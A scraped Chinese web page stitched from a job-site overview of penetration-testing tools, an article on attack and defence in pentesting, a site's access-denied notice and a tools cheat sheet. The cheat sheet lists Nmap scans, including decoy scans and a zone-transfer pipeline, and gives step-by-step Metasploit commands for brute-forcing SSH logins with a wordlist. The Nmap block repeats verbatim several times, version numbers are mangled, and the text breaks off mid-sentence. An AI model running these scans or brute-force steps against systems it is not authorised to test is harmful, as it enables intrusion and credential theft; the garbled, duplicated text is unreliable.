什么是渗透测试最有效的方法 渗透测试最有效的方法的方法
点击联系发帖人
时间:2017-05-29 00:08
【渗透测试工程师岗位职责|渗透测试工程师是做什么的】-看准网
渗透测试工程师
渗透测试工具
渗透测试是一种利用模拟黑客攻击的方式,来评估计算机网络系统攻击步骤
安全性能的方法。评估计算机网络系统
安全性能的方法。通常的黑客攻击包括预攻击、攻击和后攻击三个阶段;预攻击阶段主要指一些信息收集和漏洞扫描的过程;攻击过程主要是利用第一阶段发现的漏洞或弱口令等脆弱性进行入侵;后攻击是指在获得攻击目标的一定权限后,对权限的提升、后面安装和痕迹清除等后续工作。与黑客的攻击相比,渗透测试仅仅进行预攻击阶段的工作,并不对系统本身造成危害,即仅仅通过一些信息搜集手段来探查系统的弱口令、漏洞等脆弱性信息。为了进行渗透测试,通常需要一些专业工具进行信息收集。渗透测试工具种类繁多,涉及广泛,按照功能和攻击目标分为网络扫描工具、通用漏洞检测、应用漏洞检测三类。
网络扫描工具
网络扫描是渗透测试的第一步,其目的在于发现目标的操作系统类型、开放端口等基本信息,为后续的扫描工作做基础。事实上,利用操作系统本身的一些命令如ping、telnet、nslookup等也可以对目标的信息进行判断,但是利用专业的工具可以给出更加全面和准确的判断。
NMap 是Linux操作系统下的一款网络连接端扫描软件,其功能主要有三个:探测一组主机是否在线;扫描主机端口是否打开;判断目标操作系统。NMap的常用扫描方式有:
》 TCP connect端口扫描:-sT参数
》 端口扫描TCP同步:-sS参数
》 端口扫描UDP:-sU参数
》 Ping扫描:-sP参数
SuperScan是一款功能强大的端口扫描软件,其主要功能有:
1) 通过Ping来检验IP是否在线; 2) IP和域名相互转换; 3) 检验目标计算机提供的服务类别; 4) 检验一定范围目标计算机的是否在线和端口情况; 5) 工具自定义列表检验目标计算机是否在线和端口情况; 6) 自定义要检验的端口,并可以保存为端口列表文件; 7) 软件自带一个木马端口列表trojans.lst,通过这个列表我们可以检测目标计算机是否有木马;同时,我们也可以自己定义修改这个木马端口列表.
Wireshark是一个网络封包分析软件,其功能是借取流经本地网卡的有数据流量进而分Wireshark
析。通常的应用包括:网络管理员用来解决网络问题、网络安全工程师用来检测安全隐患、开发人员用来测试协议执行情况、用来学习网络协议。 在渗透测试中,Wireshark通常被用于嗅探局域网内的数据传输格式,探查是否存在明文传输口令、数据传输风险等。图形界面的Wireshark使用十分便捷,选取监听的网卡之后,主界面中会显示所有的数据流量。双击任意条目,则可以根据协议的层次拆分该数据流。Wireshark内置了基本的网络协议,可以方便的查询包括但不局限于IP、TCP、UDP、HTTP、FTP、SMB等常见的协议内容。
由于Wireshark借取的数据是所有流经网卡的数据,在实际应用中最重要的操作是通编写过滤器获得需要的数据流量。主界面中的Filter选项可以方便的进行过滤器的编辑,过滤包括源地址、目的地址、协议类型等配合各种逻辑运算符组成的表达式,从而根据需要快速的找到目标数据流量。
通用漏洞检测
在获取了目标主机的操作系统、开放端口等基本信息后,通常利用通用漏洞扫描工具检测目标系统所存在的漏洞和弱口令。通用漏洞主要指操作系统本身或者安装的应用软件所存在的漏洞,通常是指缓冲区漏洞,例如MS-8-67、oracle的漏洞。由于系统开启了135、139、445、等应用程序端口,同时没有及时安装补丁,使得外来主机可以通过相应的端口发送恶意的请求从而获取不应当获得的系统权限。 在实际的应用中,如果防火墙做了良好的部署,则对外界展现的端口应该受到严格控制,相应的通用漏洞危害较小。但是如果没有在边界上进行良好的访问控制,则缓冲区溢出漏洞有着极其严重的威胁,会轻易被恶意用户利用获得服务器的最高权限。
Nessus 是一款系统漏洞扫描与分析软件,采用B/S架构的Nessus
方式安装,以网页的形式向用户展现。用户登录之后可以指定对本机或者其他可访问的服务器进行漏洞扫描。Nessus的扫描程序与漏洞库相互独立,因而可以方便的更新其漏洞库,同时提供多种插件的扩展和一种语言NASL(Nessus Attack Scripting Language)用来编写测试选项,极大的方便了漏洞数据的维护、更新。在进行扫描完成后,Nessus还可以生成详尽的用户报告,包括脆弱性、漏洞修补方法以及危害级别等,可以方便的进行后续加固工作。
X-Scan 是一款国产的漏洞扫描软件,完全免费,无需安装,X-Scan
由国内著名民间黑客组织“安全焦点”完成。X-Scan的功能包括:开放服务、操作系统鉴别、应用系统弱口令、IIS编码漏洞、应用漏洞检测等。
X-Scan通常被用来进行弱口令的检测,其提供的弱口令检测模块包含telnet、ftp、SQL-server、cvs、vnc、smtp、nntp、sock5、imap、pop3、rexec、NT-Server、ssh、www,采用字典攻击的方式,配合恰当的字典生成工具可以完成大部分常用应用软件的弱口令破解工作。X-Scan也提供漏洞检测脚本的加载方式,可以即时的更新扫描模块,同时也提供扫描结果报告功能。
Metasploit
Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。
事实上Metasploit提供的是一个通用的漏洞攻击框架,通过它可以方便的获取、开发针对漏洞的攻击。Metasploit将负载控制,编码器,无操作生成器和漏洞整合在一起,成为一种研究高危漏洞的途径,它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。 对于开发者来说,需要了解缓冲区溢出的原理、需要编写的漏洞详细情况、payload生成、注入点以及metasploit的漏洞编写规则。而对于普通的渗透测试人员,仅仅只需要安装metasploit,下载最新的漏洞库和shellcode,选择攻击目标,发送测试就可以完成漏洞检测工作。事实上,metasploit不仅提供漏洞检测,还可以进行实际的入侵工作。由于采用入侵脚本时可能对系统造成不可预估的效果,在进行渗透测试时应当仅仅使用测试功能。
Acunetix Web Vulnerability Scanner
Acunetix Web Vulnerability Scanner界面
Acunetix Web Vulnerability Scanner是一个网站及
服务器漏洞扫描软件,它包含有收费和免费两种版本。
功能介绍:
1、AcuSensor 技术
2、自动的客户端脚本分析器,允许对 Ajax 和 Web 2. 应用程序进行安全性测试。
3、业内最先进且深入的 SQL 注入和跨站脚本测试
4、高级渗透测试工具,例如 HTTP Editor 和 HTTP Fuzzer
5、可视化宏记录器帮助您轻松测试 web 表格和受密码保护的区域
6、支持含有 CAPTHCA 的页面,单个开始指令和 Two Factor(双因素)验证机制
7、丰富的报告功能,包括 VISA PCI 依从性报告
8、高速的多线程扫描器轻松检索成千上万个页面
9、智能爬行程序检测 web 服务器类型和应用程序语言
1、Acunetix 检索并分析网站,包括 flash 内容、SOAP 和 AJAX
11、端口扫描 web 服务器并对在服务器上运行的网络服务执行安全检查
Web应用漏洞检测
随着信息网络的发展,人们的信息安全意识日益提升,信息系统的安全防护措施也逐渐提高。通常在服务器的互联网边界处都会部署防火墙来隔离内外网络,仅仅将外部需要的服务器端口暴露出来。采用这种措施可以大大的提高信息系统安全等级,对于外部攻击者来说,就像关闭了所有无关的通路,仅仅留下一个必要入口。但是仍然有一类安全问题无法避免,就是web应用漏洞。 目前的大多数应用都是采用B/S模式,由于服务器需要向外界提供web应用,http服务是无法关闭的。web应用漏洞就是利用这个合法的通路,采用SQL注入、跨站脚本、表单破解等应用攻击方式来获取服务器的高级权限。在目前的网络环境下,威胁最大的漏洞形式就是web应用漏洞,通常是攻击者攻陷服务器的第一步。常见的漏洞包括SQL注入、跨站脚本攻击和编码漏洞等,表单破解主要是针对服务器用户的弱口令破解。从本质上来说,应用漏洞的形成原因是程序编写时没有对用户的输入字符进行严格的过滤,造成用户可以精心构造一个恶意字符串达到自己的目的。
AppScan 是IBM公司出的一款Web应用安全测试工具,AppScan
采用黑盒测试的方式,可以扫描常见的web应用安全漏洞。其工作原理,首先是根据起始页爬取站下所有可见的页面,同时测试常见的管理后台;获得所有页面之后利用SQL注入原理进行测试是否存在注入点以及跨站脚本攻击的可能;同时还会对cookie管理、会话周期等常见的web安全漏洞进行检测。AppScan功能十分齐全,支持登录功能并且拥有十分强大的报表。在扫描结果中,不仅能够看到扫描的漏洞,还提供了详尽的漏洞原理、修改建议、手动验证等功能。AppScan的缺点在于,作为一款商业软件,价格十分昂贵。
溯雪是一款国产软件,主要的功能是进行表单破解。溯雪
由于目前的应用多数采用B/S模式,登录窗口也都采用表单提交的方式,使得基于传统协议的暴力破解软件没有用武之地。针对此类应用,采用溯雪等基于表单的暴力破解软件可以很好的进行弱口令扫描。
溯雪的工作原理是抽取目标网站中的表单元素,搜寻错误登录时的错误标志,然后采用字典填充其值并不断提交尝试获得正确的连接。
Pangolin是一款SQL注入测试工具,能够自动化的进行Pangolin
注入漏洞的检测,从检测注入开始到最后控制目标系统都给出了测试步骤,是目前国内使用率最高的SQL注入测试软件。支持的数据库包括Access、DB2、Informix、Microsoft SQL Server 2、Microsoft SQL Server 25、Microsoft SQL Server 28、Mysql、Oracle、PostgreSQL、Sqlite3、Sybase。
#渗透测试工程师#&
#测试工程师#&
#渗透测试工程师#&
#测试工程师#&
平均¥8468
工资分布图(k)
该职位相关热门公司
28474条信息
看了该职位的还看了
32704条信息
29176条信息
39517条信息
43882条信息
14401条信息
关注看准官方微信
下载看准官方APP
找工作,下载「看准APP」
23982 位HR实时在线
广告等垃圾信息
违禁信息(色情、欺诈、非法传销)
不友善内容(诽谤,人身攻击、骚扰、侵犯隐私)
违法、政治敏感内容
感谢您的举报,我们会尽快处理~
小贴士:问题描述的越清楚,越能吸引老鸟来回答哟~
请输入问题
向老鸟咨询
把你关于渗透测试工程师的问题大胆的提出来,这里的15位老鸟很乐意为你解答~
写下问题吧~
提交成功!请静静等待老鸟们回答~
扫描二维码
分享到朋友圈,邀请微信好友帮忙解答浅谈渗透测试中的攻守之道
&&&身处不同的渗透测试环境下就会有不同的渗透思路以及渗透的技术手段,今天我们将从攻与守两个不同的视角来了解渗透测试在不同处境下所使用的技术手段。
&&&&&&&&从攻方视角看渗透
攻方既包括了潜在的黑客、入侵者,也包括了经过企业授权的安全专家。在很多黑客的视角中,只要你投入了足够多的时间和耐心,那么这个世界上就没有不可能渗透的目标。目前我们只从授权渗透的角度来讨论渗透测试的攻击路径及其可能采用的技术手段。
测试目标的不同,自然也导致了技术手段的不同,接下来我们将简单说明在不同的位置可能采用的技术手段。
内网测试指的是由渗透测试人员在内部网络发起的测试,这类的测试能够模拟企业内部违规操作者的行为。它的最主要的“优势”就是绕过了防火墙的保护。内部可能采用的主要渗透方式有:远程缓冲区溢出,口令猜测,以及B/S或C/S应用程序测试(如果在渗透测试中有涉及到C/S程序测试的,那么就需要提前准备相关客户端软件供测试使用)。
&&&&&&&&外网测试
外网测试则恰恰与内网测试相反,在此类测试当中渗透测试人员完全处于外部网络(例如拨号、ADSL或外部光纤),来模拟对内部状态一无所知的外部攻击者的行为。外部可能采用的渗透方式包括:对网络设备的远程攻击,口令管理安全性测试,防火墙规则试探、规避、Web及其它开放应用服务的安全性测试。
不同网段/Vlan之间的渗透
这种渗透方式是从某内/外部网段,尝试对另一网段/Vlan来进行渗透。这类测试通常可能用到的技术包括:对网络设备的远程攻击、对防火墙的远程攻击或规则探测、规避尝试。
信息的收集和分析伴随着渗透测试的每一个步骤,而每一个步骤又有三个部分组成:操作、响应和结果分析。
通过对目标地址的TCP/UDP端口扫描,确定其所开放的服务的数量以及类型,这是所有渗透测试的基础。端口扫描是计算机解密高手喜欢的一种方式。通过端口扫描,可以大致确定一个系统的基本信息并搜集到很多关于目标主机的各种有用的信息,然后再结合安全工程师的相关经验就可以确定其可能存在的以及可能被利用的安全弱点,从而为进行深层次的渗透提供可靠性依据。
这是当前出现的频率最高、威胁最严重,同时又是最容易实现的一种渗透方法,一个仅仅具有一般的基础性网络知识的入侵者就可以在相当短的时间内利用现成的工具实现远程溢出攻击。
对于防火墙内的系统同样存在这样的风险,只要对跨接防火墙内外的一台主机攻击成功,那么通过这台主机对防火墙内的主机进行攻击就易如反掌。
口令猜测也是一种出现概率很高的风险,几乎不需要任何攻击工具,利用一个简单的暴力攻击程序和一个比较完善的字典,就可以进行猜测口令。
对一个系统账号的猜测通常包括两个方面:首先是对用户名的猜测,其次是对密码的猜测。只要攻击者能猜测或者确定用户口令,就能获得机器或者网络的访问权,并且能够访问到用户能够访问的审核信息资源。
&&&&&&&&本地溢出
所谓本地溢出是指在拥有了一个普通用户的账号之后,通过一段特殊的指令代码来获取管理员权限的方法。使用本地溢出的前提是首先你要获得一个普通用户密码。也就是说由于导致本地溢出的一个关键条件是设置不当的密码策略。
多年的实践证明,在经过前期的口令猜测阶段获取的普通账号登录系统之后,对系统实施本地溢出攻击,就能获取不进行主动安全防御的系统的控制管理权限。
&&&&&&&&脚本及应用测试
&&&&&&&&Web脚本及应用测试专门针对Web及数据库服务器进行。根据最新的技术统计表明,脚本安全弱点是当前Web系统尤其是存在动态内容的Web系统比较严重的安全弱点之一。利用脚本相关弱点轻则可以获取系统其他目录的访问权限,重则将有可能取得系统的控制管理权限。因此对于含有动态页面的Web、数据库等系统,Web脚本及应用测试将是渗透测试中必不可少的一个环节。
在Web脚本及应用测试中,可能需要检查的部份包括:
(1)检查应用系统架构,防止用户绕过系统直接修改数据库;&
(2)检查身份认证模块,用以防止非法用户绕过身份认证;
(3)检查数据库接口模块,用以防止用户获取系统权限;
(4)检查文件接口模块,防止用户获取系统文件;
(5)检查其他安全威胁。
&&&&&&&&虽然中国的无线网络还处于建设时期,但是无线网络的部署及其简易,所以在一些大城市里的普及率已经很高了。在北京和上海的商务区内至少有80%的地方都可以找到接入点。
通过对无线网络的测试,可以判断企业局域网的安全性,这已经成为渗透测试中越来越重要的环节。
&&&&&&&&除了以上的测试手段以外,还有一些可能会在渗透测试过程中使用的技术,包括:社交工程学、拒绝服务攻击,以及中间人攻击。
从守方视角看渗透
当具备渗透测试攻击经验的人们站到系统管理员的角度,要保障一个大网的安全时,我们会发现,关注点是完全不同的。从攻方的视角看是“攻其一点,不及其余”,只要找到一个小漏洞,就有可能撕开整条战线;但如果你从守方的视角来看,就会发现往往是“千里之堤,毁于蚁穴”。因此,必须要有好的理论指引,从技术到管理都要注重安全,才能使网络固若金汤。
&&&&&&&&渗透测试的必要性
&&&&&&&&渗透测试利用网络安全扫描器、专用安全测试工具和富有经验的安全工程师的人工经验对网络中的核心服务及其重要的网络设备,包括服务器、网络设备、防火墙等进行非破坏性质的模拟黑客攻击,目的是侵入系统并获取机密信息并将入侵的过程和细节产生报告给用户,从而实现网络信息安全的防护。
&&&&&&&&渗透测试和工具扫描可以很好的互相补充。工具扫描具有很好的效率和速度,但存在一定的误报率和漏报率,并且不能发现高层次的、复杂的、并且相互关联的安全问题;而渗透测试则需要投入大量的人力资源、并且对测试者的专业技能要求很高(渗透测试报告的价值直接依赖于测试者的专业技能水平),但是非常准确,可以发现逻辑性更强、更深层次的弱点,效果更加的明显。
&&&&&&&&一般的渗透测试流程如下:
时间的选择
为减少渗透测试对网络和主机的负面影响,渗透测试的时间尽量安排在业务量不大的时段或者是晚上。
策略的选择
为了防止渗透测试造成网络和主机的业务中断的问题,在渗透测试的过程中尽量不使用含有拒绝服务的测试策略。
授权渗透测试的监测手段
在评估过程中,由于渗透测试的特殊性,用户可以要求对整体测试流程进行实时的监控(PS:可能会提高渗透测试的成本)。
测试方自控
由渗透测试方对本次测透测试过程中的三方面数据进行完整记录:操作、响应、分析,最终会形成完整有效的渗透测试报告并将其提交给用户。
用户监控一共有四种形式:
全程监控:采用类似Ethereal的嗅探软件进行全程抓包嗅探;
择要监控:对其扫描过程不进行录制,仅在安全工程师分析数据后,准备发起渗透前才开启软件进行嗅探;
主机监控:仅监控受测主机的存活状态,用以避免意外情况发生;
指定攻击源:用户指定由特定攻击源地址进行攻击,该源地址的主机由用户进行进程、网络连接、数据传输等多方面的监督控制。
&&&&&&&&(友情提示:文章中会出现与之前文章些许重复的情况,望各位亲包容,不过重复即是记忆。
已投稿到:
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。拒绝访问 |
| 百度云加速
请打开cookies.
此网站 () 的管理员禁止了您的访问。原因是您的访问包含了非浏览器特征(38dedd-ua98).
重新安装浏览器,或使用别的浏览器一、端口扫描工具
功能介绍及参数相关文档
1) 获取远程主机的类型及开放端口
nmap -sS -P0 -sV -O &target&
这里的 & target & 可以是单一 IP, 或主机名,或域名,或子网
-sS TCP SYN 扫描 (又称半开放,或隐身扫描)-P0 允许你关闭 ICMP pings.-sV 打开系统版本检测-O 尝试识别远程操作系统
-A 同时打开操作系统指纹和版本检测-v 详细输出扫描情况.
nmap -sS -P0 -A -v & target &
2) 列出开放了指定端口的主机列表
nmap -sT -p 80 -oG & 192.168.1.* | grep open
3) 在网络寻找所有在线主机
nmap -sP 192.168.0.*
或者也可用以下命令:
nmap -sP 192.168.0.0/24
指定 subnet
4) Ping 指定范围内的 IP 地址
nmap -sP 192.168.1.100-254
5) 在某段子网上查找未占用的 IP
nmap -T4 -sP 192.168.2.0/24 && egrep "00:00:00:00:00:00" /proc/net/arp
6) 在局域网上扫找 Conficker 蠕虫病毒
nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args safe=1 192.168.0.1-254
7) 扫描网络上的恶意接入点 (rogue APs).
nmap -A -p1-85,113,443, -T4 --min-hostgroup 50 --max-rtt-timeout 2000 --initial-rtt-timeout 300 --max-retries 3 --host-timeout 20m --max-scan-delay 1000 -oA wapscan 10.0.0.0/8
8 ) 使用诱饵扫描方法来扫描主机端口
sudo nmap -sS 192.168.0.10 -D 192.168.0.2
9) 为一个子网列出反向 DNS 记录
nmap -R -sL 209.85.229.99/27 | awk {if($3=="not")print"("$2") no PTR";else print$3" is "$2} | grep
10) 显示网络上共有多少台 &及 Win 设备?
sudo nmap -F -O 172.18.16.1-255 | grep "Running: " & /tmp/ echo "$(cat /tmp/os | grep Linux | wc -l) Linux device(s)"; echo "$(cat /tmp/os | grep Windows | wc -l) Window(s) device"
nmap -sP 192.168.1.0/24 仅列出指定网络上的每台主机,不发送任何报文到目标主机: nmap -sL 192.168.1.0/24 探测目标主机开放的端口,可以指定一个以逗号分隔的端口列表(如-PS22,23,25,80): nmap -PS 192.168.1.234 使用UDP ping探测主机: nmap -PU 192.168.1.0/24 使用频率最高的扫描选项:SYN扫描,又称为半开放扫描,它不打开一个完全的TCP连接,执行得很快: nmap -sS 192.168.1.0/24 当SYN扫描不能用时,TCP Connect()扫描就是默认的TCP扫描: nmap -sT 192.168.1.0/24 UDP扫描用-sU选项,UDP扫描发送空的(没有数据)UDP报头到每个目标端口: nmap -sU 192.168.1.0/24 确定目标机支持哪些IP协议 (TCP,ICMP,IGMP等): nmap -sO 192.168.1.19 探测目标主机的操作系统: nmap -O 192.168.1.19 nmap -A 192.168.1.19 另外,nmap官方文档中的例子: nmap -v scanme. 这个选项扫描主机scanme中 所有的保留TCP端口。选项-v启用细节模式。 nmap -sS -O scanme./24 进行秘密SYN扫描,对象为主机Saznme所在的&C类&网段的255台主机。同时尝试确定每台工作主机的操作系统类型。因为进行SYN扫描和操作系统检测,这个扫描需要有根权限。 nmap -sV -p 22,53,110,143,.0-255.1-127 进行主机列举和TCP扫描,对象为B类188.116网段中255个8位子网。这个测试用于确定系统是否运行了sshd、DNS、imapd或4564端口。如果这些端口打开,将使用版本检测来确定哪种应用在运行。 nmap -v -iR 100000 -P0 -p 80 随机选择100000台主机扫描是否运行Web服务器(80端口)。由起始阶段发送探测报文来确定主机是否工作非常浪费时间,而且只需探测主机的一个端口,因 此使用-P0禁止对主机列表。 nmap -P0 -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20 扫描4096个IP地址,查找Web服务器(不ping),将结果以Grep和XML格式保存。 host -l | cut -d -f 4 | nmap -v -iL - 进行DNS区域传输,以发现中的主机,然后将IP地址提供给 Nmap。上述命令用于GNU/Linux -- 其它系统进行区域传输时有不同的命令。 其他选项: -p (只扫描指定的端口) 单个端口和用连字符表示的端口范 围(如 1-1023)都可以。当既扫描TCP端口又扫描UDP端口时,可以通过在端口号前加上T: 或者U:指定协议。 协议限定符一直有效直到指定另一个。 例如,参数 -p U:53,111,137,T:21-25,80,139,8080 将扫描UDP 端口53,111,和137,同时扫描列出的TCP端口。 -F (快速 (有限的端口) 扫描)nmap -sP 192.168.1.0/24 仅列出指定网络上的每台主机,不发送任何报文到目标主机: nmap -sL 192.168.1.0/24 探测目标主机开放的端口,可以指定一个以逗号分隔的端口列表(如-PS22,23,25,80): nmap -PS 192.168.1.234 使用UDP ping探测主机: nmap -PU 192.168.1.0/24 使用频率最高的扫描选项:SYN扫描,又称为半开放扫描,它不打开一个完全的TCP连接,执行得很快: nmap -sS 192.168.1.0/24 当SYN扫描不能用时,TCP Connect()扫描就是默认的TCP扫描: nmap -sT 192.168.1.0/24 UDP扫描用-sU选项,UDP扫描发送空的(没有数据)UDP报头到每个目标端口: nmap -sU 192.168.1.0/24 确定目标机支持哪些IP协议 (TCP,ICMP,IGMP等): nmap -sO 192.168.1.19 探测目标主机的操作系统: nmap -O 192.168.1.19 nmap -A 192.168.1.19 另外,nmap官方文档中的例子: nmap -v scanme. 这个选项扫描主机scanme中 所有的保留TCP端口。选项-v启用细节模式。 nmap -sS -O scanme./24 进行秘密SYN扫描,对象为主机Saznme所在的&C类&网段的255台主机。同时尝试确定每台工作主机的操作系统类型。因为进行SYN扫描和操作系统检测,这个扫描需要有根权限。 nmap -sV -p 22,53,110,143,.0-255.1-127 进行主机列举和TCP扫描,对象为B类188.116网段中255个8位子网。这个测试用于确定系统是否运行了sshd、DNS、imapd或4564端口。如果这些端口打开,将使用版本检测来确定哪种应用在运行。 nmap -v -iR 100000 -P0 -p 80 随机选择100000台主机扫描是否运行Web服务器(80端口)。由起始阶段发送探测报文来确定主机是否工作非常浪费时间,而且只需探测主机的一个端口,因 此使用-P0禁止对主机列表。 nmap -P0 -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20 扫描4096个IP地址,查找Web服务器(不ping),将结果以Grep和XML格式保存。 host -l | cut -d -f 4 | nmap -v -iL - 进行DNS区域传输,以发现中的主机,然后将IP地址提供给 Nmap。上述命令用于GNU/Linux -- 其它系统进行区域传输时有不同的命令。 其他选项: -p (只扫描指定的端口) 单个端口和用连字符表示的端口范 围(如 1-1023)都可以。当既扫描TCP端口又扫描UDP端口时,可以通过在端口号前加上T: 或者U:指定协议。 协议限定符一直有效直到指定另一个。 例如,参数 -p U:53,111,137,T:21-25,80,139,8080 将扫描UDP 端口53,111,和137,同时扫描列出的TCP端口。 -F (快速 (有限的端口) 扫描)nmap -sP 192.168.1.0/24 仅列出指定网络上的每台主机,不发送任何报文到目标主机: nmap -sL 192.168.1.0/24 探测目标主机开放的端口,可以指定一个以逗号分隔的端口列表(如-PS22,23,25,80): nmap -PS 192.168.1.234 使用UDP ping探测主机: nmap -PU 192.168.1.0/24 使用频率最高的扫描选项:SYN扫描,又称为半开放扫描,它不打开一个完全的TCP连接,执行得很快: nmap -sS 192.168.1.0/24 当SYN扫描不能用时,TCP Connect()扫描就是默认的TCP扫描: nmap -sT 192.168.1.0/24 UDP扫描用-sU选项,UDP扫描发送空的(没有数据)UDP报头到每个目标端口: nmap -sU 192.168.1.0/24 确定目标机支持哪些IP协议 (TCP,ICMP,IGMP等): nmap -sO 192.168.1.19 探测目标主机的操作系统: nmap -O 192.168.1.19 nmap -A 192.168.1.19 另外,nmap官方文档中的例子: nmap -v scanme. 这个选项扫描主机scanme中 所有的保留TCP端口。选项-v启用细节模式。 nmap -sS -O scanme./24 进行秘密SYN扫描,对象为主机Saznme所在的&C类&网段的255台主机。同时尝试确定每台工作主机的操作系统类型。因为进行SYN扫描和操作系统检测,这个扫描需要有根权限。 nmap -sV -p 22,53,110,143,.0-255.1-127 进行主机列举和TCP扫描,对象为B类188.116网段中255个8位子网。这个测试用于确定系统是否运行了sshd、DNS、imapd或4564端口。如果这些端口打开,将使用版本检测来确定哪种应用在运行。 nmap -v -iR 100000 -P0 -p 80 随机选择100000台主机扫描是否运行Web服务器(80端口)。由起始阶段发送探测报文来确定主机是否工作非常浪费时间,而且只需探测主机的一个端口,因 此使用-P0禁止对主机列表。 nmap -P0 -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20 扫描4096个IP地址,查找Web服务器(不ping),将结果以Grep和XML格式保存。 host -l | cut -d -f 4 | nmap -v -iL - 进行DNS区域传输,以发现中的主机,然后将IP地址提供给 Nmap。上述命令用于GNU/Linux -- 其它系统进行区域传输时有不同的命令。 其他选项: -p (只扫描指定的端口) 单个端口和用连字符表示的端口范 围(如 1-1023)都可以。当既扫描TCP端口又扫描UDP端口时,可以通过在端口号前加上T: 或者U:指定协议。 协议限定符一直有效直到指定另一个。 例如,参数 -p U:53,111,137,T:21-25,80,139,8080 将扫描UDP 端口53,111,和137,同时扫描列出的TCP端口。 -F (快速 (有限的端口) 扫描)
二、中间人攻击arp工具
Ettercap:
三、破解工具
1.Metasploit:MSF破解ssh
msf:(全称)metasploit freamwork
使用命令: &&破解ssh登录名和密码 &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
msconsole回车
search ssh &查找ssh相关的模块
use auxiliary/scanner/ssh/ssh_login &调用ssh破解程序 &&&&&&&&&&&&&&&
show options &&&查看选项
set rhosts 127.0.0.1 设置要破解的IP地址(必须能ping通)
set rport 22 &&&设置端口
set username root 设置用户名
set pass_file /root/*.* &设置密码文件
set threads 50 &&设置线程50
run &&开始执行
telnet同理,
kali自带密码字典路径//usr/share/wordlists/w3af.txt
注:所有路径必须是绝对路径nmap -sP 192.168.1.0/24 仅列出指定网络上的每台主机,不发送任何报文到目标主机: nmap -sL 192.168.1.0/24 探测目标主机开放的端口,可以指定一个以逗号分隔的端口列表(如-PS22,23,25,80): nmap -PS 192.168.1.234 使用UDP ping探测主机: nmap -PU 192.168.1.0/24 使用频率最高的扫描选项:SYN扫描,又称为半开放扫描,它不打开一个完全的TCP连接,执行得很快: nmap -sS 192.168.1.0/24 当SYN扫描不能用时,TCP Connect()扫描就是默认的TCP扫描: nmap -sT 192.168.1.0/24 UDP扫描用-sU选项,UDP扫描发送空的(没有数据)UDP报头到每个目标端口: nmap -sU 192.168.1.0/24 确定目标机支持哪些IP协议 (TCP,ICMP,IGMP等): nmap -sO 192.168.1.19 探测目标主机的操作系统: nmap -O 192.168.1.19 nmap -A 192.168.1.19 另外,nmap官方文档中的例子: nmap -v scanme. 这个选项扫描主机scanme中 所有的保留TCP端口。选项-v启用细节模式。 nmap -sS -O scanme./24 进行秘密SYN扫描,对象为主机Saznme所在的&C类&网段的255台主机。同时尝试确定每台工作主机的操作系统类型。因为进行SYN扫描和操作系统检测,这个扫描需要有根权限。 nmap -sV -p 22,53,110,143,.0-255.1-127 进行主机列举和TCP扫描,对象为B类188.116网段中255个8位子网。这个测试用于确定系统是否运行了sshd、DNS、imapd或4564端口。如果这些端口打开,将使用版本检测来确定哪种应用在运行。 nmap -v -iR 100000 -P0 -p 80 随机选择100000台主机扫描是否运行Web服务器(80端口)。由起始阶段发送探测报文来确定主机是否工作非常浪费时间,而且只需探测主机的一个端口,因 此使用-P0禁止对主机列表。 nmap -P0 -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20 扫描4096个IP地址,查找Web服务器(不ping),将结果以Grep和XML格式保存。 host -l | cut -d -f 4 | nmap -v -iL - 进行DNS区域传输,以发现中的主机,然后将IP地址提供给 Nmap。上述命令用于GNU/Linux -- 其它系统进行区域传输时有不同的命令。 其他选项: -p (只扫描指定的端口) 单个端口和用连字符表示的端口范 围(如 1-1023)都可以。当既扫描TCP端口又扫描UDP端口时,可以通过在端口号前加上T: 或者U:指定协议。 协议限定符一直有效直到指定另一个。 例如,参数 -p U:53,111,137,T:21-25,80,139,8080 将扫描UDP 端口53,111,和137,同时扫描列出的TCP端口。 -F (快速 (有限的端口) 扫描)nmap -sP 192.168.1.0/24 仅列出指定网络上的每台主机,不发送任何报文到目标主机: nmap -sL 192.168.1.0/24 探测目标主机开放的端口,可以指定一个以逗号分隔的端口列表(如-PS22,23,25,80): nmap -PS 192.168.1.234 使用UDP ping探测主机: nmap -PU 192.168.1.0/24 使用频率最高的扫描选项:SYN扫描,又称为半开放扫描,它不打开一个完全的TCP连接,执行得很快: nmap -sS 192.168.1.0/24 当SYN扫描不能用时,TCP Connect()扫描就是默认的TCP扫描: nmap -sT 192.168.1.0/24 UDP扫描用-sU选项,UDP扫描发送空的(没有数据)UDP报头到每个目标端口: nmap -sU 192.168.1.0/24 确定目标机支持哪些IP协议 (TCP,ICMP,IGMP等): nmap -sO 192.168.1.19 探测目标主机的操作系统: nmap -O 192.168.1.19 nmap -A 192.168.1.19 另外,nmap官方文档中的例子: nmap -v scanme. 这个选项扫描主机scanme中 所有的保留TCP端口。选项-v启用细节模式。 nmap -sS -O scanme./24 进行秘密SYN扫描,对象为主机Saznme所在的&C类&网段的255台主机。同时尝试确定每台工作主机的操作系统类型。因为进行SYN扫描和操作系统检测,这个扫描需要有根权限。 nmap -sV -p 22,53,110,143,.0-255.1-127 进行主机列举和TCP扫描,对象为B类188.116网段中255个8位子网。这个测试用于确定系统是否运行了sshd、DNS、imapd或4564端口。如果这些端口打开,将使用版本检测来确定哪种应用在运行。 nmap -v -iR 100000 -P0 -p 80 随机选择100000台主机扫描是否运行Web服务器(80端口)。由起始阶段发送探测报文来确定主机是否工作非常浪费时间,而且只需探测主机的一个端口,因 此使用-P0禁止对主机列表。 nmap -P0 -p80 -oX logs/pb-port80scan.xml -oG logs/pb-port80scan.gnmap 216.163.128.20/20 扫描4096个IP地址,查找Web服务器(不ping),将结果以Grep和XML格式保存。 host -l | cut -d -f 4 | nmap -v -iL - 进行DNS区域传输,以发现中的主机,然后将IP地址提供给 Nmap。上述命令用于GNU/Linux -- 其它系统进行区域传输时有不同的命令。 其他选项: -p (只扫描指定的端口) 单个端口和用连字符表示的端口范 